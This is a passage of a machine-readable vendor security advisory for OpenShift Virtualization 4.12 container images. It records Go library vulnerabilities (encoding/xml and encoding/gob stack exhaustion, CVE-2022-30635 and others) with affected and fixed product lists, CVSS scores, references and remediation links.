"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: encoding/xml: stack exhaustion in Unmarshal", }, { cve: "CVE-2022-30635", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107388", }, ], notes: [ { category: "description", text: "A flaw was found in golang. When calling Decoder, Decode on a message that contains deeply nested structures, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: encoding/gob: stack exhaustion in Decoder.Decode", title: "Vulnerability summary", }, { category: "other", text: "OpenShift Container Platform (OCP) starting from 4.10 stream is already compiled in the patched version of Go, hence is not affected by this vulnerability.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30635", }, { category: "external", summary: "RHBZ#2107388", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30635", url: "https://www.cve.org/CVERecord?id=CVE-2022-30635", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30635", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30635", }, { category: "external", summary: "https://go.dev/issue/53615", url: "https://go.dev/issue/53615", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: encoding/gob: stack exhaustion in Decoder.Decode", }, { cve: "CVE-2022-32148", cwe: { id: "CWE-200", name: "Exposure of Sensitive Information to an Unauthorized Actor", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", 